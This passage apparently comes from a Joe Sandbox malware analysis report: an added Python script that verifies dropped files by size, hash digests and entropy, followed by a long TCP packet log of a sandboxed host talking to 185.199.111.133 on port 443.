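Each dropped-file entry above, and the static file info for the sample itself, carries the same identification fields: size, Entropy (8bit), MD5, SHA1, SHA-256 and SHA-512. The following Python is an added example and not part of the Joe Sandbox report; it reproduces those fields for a file and compares them with the values copied from a report entry, so that a file pulled from the sandbox or from an infected host can be confirmed to be the artifact the report describes. The check values in the script are constructed (the standard digests of the three-byte string "abc") rather than taken from this report, so it runs offline; the entropy function is the ordinary Shannon entropy in bits per byte, which is the quantity the report labels "Entropy (8bit)".

```python
import hashlib
import math
from collections import Counter


def shannon_entropy_8bit(data):
    """Shannon entropy of a byte string in bits per byte (0.0 to 8.0).

    0.0 for a constant file, 8.0 for uniformly distributed bytes.  Packed,
    compressed or encrypted payloads sit near the top of the range; plain
    text such as the 437 KB VBS above (about 5.1) sits well below it.
    """
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def fingerprint(data):
    """The identification fields a report entry carries for one artifact."""
    return {
        "size": len(data),
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "sha512": hashlib.sha512(data).hexdigest(),
        "entropy": shannon_entropy_8bit(data),
    }


def verify_against_report(data, expected):
    """Compare an artifact against fields copied from a report entry.

    `expected` maps a field name ("size", "md5", "sha1", "sha256", "sha512",
    "entropy") to the report's value.  Hex digests are compared
    case-insensitively (the report prints them in upper case) and entropy with
    a small tolerance.  Returns the names of the fields that do not match; an
    empty list means the file is the artifact the entry describes.
    """
    have = fingerprint(data)
    mismatched = []
    for field, want in expected.items():
        if field == "size":
            ok = have["size"] == int(want)
        elif field == "entropy":
            ok = abs(have["entropy"] - float(want)) < 1e-9
        else:
            ok = have[field].lower() == str(want).strip().lower()
        if not ok:
            mismatched.append(field)
    return mismatched


if __name__ == "__main__":
    import sys

    # Constructed check values: the well-known digests of b"abc", standing in
    # for a real report entry so the script can be run without the sample.
    sample = b"abc"
    report_entry = {
        "size": "3",
        "md5": "900150983CD24FB0D6963F7D28E17F72",
        "sha1": "A9993E364706816ABA3E25717850C26C9CD0D89D",
        "sha256": "BA7816BF8F01CFEA414140DE5DAE2223B00361A396177A9CB410FF61F20015AD",
    }
    print("mismatches for constructed sample:", verify_against_report(sample, report_entry))

    # Real use: pass the dropped files on the command line and compare the
    # printed fields with the report entries, or feed them to verify_against_report.
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, fingerprint(fh.read()))
```

A mismatch on size or any digest means the file is not the one the report analysed (a re-obfuscated copy, or a truncated download), which matters when a report is used to justify blocking or as a reference during incident response; an entropy value alone is only a rough indicator and is not used for identity.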
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 2, 2024 05:26:48.864020109 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:48.864078999 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:48.864167929 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:48.873025894 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:48.873039007 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.336308002 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.336417913 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.340517998 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.340538025 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.340826988 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.352858067 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.399404049 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.447026014 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.447618961 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.447654963 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.447665930 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.447690010 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.447724104 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.447731972 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.447737932 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.447772980 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.448352098 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.448683977 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.448712111 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.448740959 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.448756933 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.448796988 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.452336073 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.452388048 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.452435017 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.452452898 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.492675066 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.543792009 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.543854952 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.543925047 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.543950081 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.543987989 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.544018984 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.544050932 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.544070959 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.544173002 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.544173002 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.544182062 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.544235945 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.544694901 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.544796944 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.544825077 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.544847012 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.544852972 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.544892073 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.546610117 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.546618938 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.546658993 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.546677113 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.546684980 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.546710968 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.546722889 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.630934000 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.630956888 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.631099939 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.631127119 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.631190062 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.632564068 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.632579088 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.632638931 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.632653952 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.632692099 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.635188103 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.635210037 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.635283947 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.635289907 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.635298967 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.635314941 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.635332108 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.635337114 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.635364056 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.635406971 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.717816114 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.717839956 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.718008995 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.718039989 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.718095064 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.718661070 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.718679905 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.718727112 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.718732119 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.718767881 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.719038963 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.719054937 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.719099998 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.719105005 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.719141006 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.719927073 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.719947100 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.720004082 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.720010042 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.720046997 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.720732927 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.720752954 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.720808983 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.720813990 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.720846891 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.721616983 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.721632004 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.721679926 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.721683979 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.721715927 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.722454071 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.722469091 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.722526073 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.722531080 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.722573996 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.804629087 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.804656029 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.804769993 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.804797888 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.804850101 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.805011988 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.805028915 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.805104971 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.805109978 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.805159092 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.805305958 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.805322886 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.805362940 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.805366993 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.805393934 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.805408001 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.805881023 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.805896997 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.805931091 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.805936098 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.805962086 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.805978060 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.806255102 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.806286097 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.806320906 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.806324959 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.806350946 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.806369066 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.809654951 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.809675932 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.809750080 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.809768915 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.809813023 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.810075045 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.810091972 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.810141087 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.810146093 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.810185909 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.810537100 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.810554981 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.810606956 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.810611963 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.810650110 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.891895056 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.891927958 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.892194033 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.892226934 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.892268896 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.892278910 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.892285109 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.892317057 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.892328978 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.892362118 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.892366886 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.892395973 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.892424107 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.892740965 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.892755032 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.892807007 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.892812014 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.892821074 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.892839909 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.892844915 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.892873049 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.892879009 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.892898083 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.892924070 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.893451929 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.893466949 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.893516064 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.893522978 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.893568993 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.893822908 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.893838882 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.893887997 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.893894911 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.893904924 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.893938065 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.894188881 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.894207954 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.894257069 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.894263983 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.894301891 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.894654989 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.894674063 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.894704103 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.894707918 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.894743919 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.894763947 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.981431961 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.981453896 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.981508017 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
Oct 2, 2024 05:26:49.981538057 CEST | 443 | 49730 | 185.199.111.133 | 192.168.2.4
Oct 2, 2024 05:26:49.981549978 CEST | 49730 | 443 | 192.168.2.4 | 185.199.111.133
                          Oct 2, 2024 05:26:49.981576920 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.981740952 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.981756926 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.981792927 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.981797934 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.981827021 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.981839895 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.982299089 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.982317924 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.982352018 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.982361078 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.982383966 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.982403040 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.982584953 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.982605934 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.982640982 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.982649088 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.982672930 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.982691050 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.983026981 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.983046055 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.983078957 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.983089924 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.983110905 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.983129978 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.983592033 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.983608961 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.983659983 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.983675957 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.983716965 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.984088898 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.984106064 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.984138966 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.984153032 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.984174967 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.984190941 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.984456062 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.984469891 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.984507084 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.984518051 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.984539032 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.984560013 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:50.068315029 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:50.068350077 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:50.068475962 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:50.068510056 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:50.068588018 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:50.068639040 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:50.068656921 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:50.068691969 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:50.068697929 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:50.068727016 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:50.068746090 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:50.069025993 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:50.069046021 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:50.069088936 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:50.069093943 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:50.069123983 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:50.069142103 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:50.069628000 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:50.069644928 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:50.069686890 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:50.069691896 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:50.069721937 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:50.069746017 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:50.069928885 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:50.069946051 CEST44349730185.199.111.133192.168.2.4
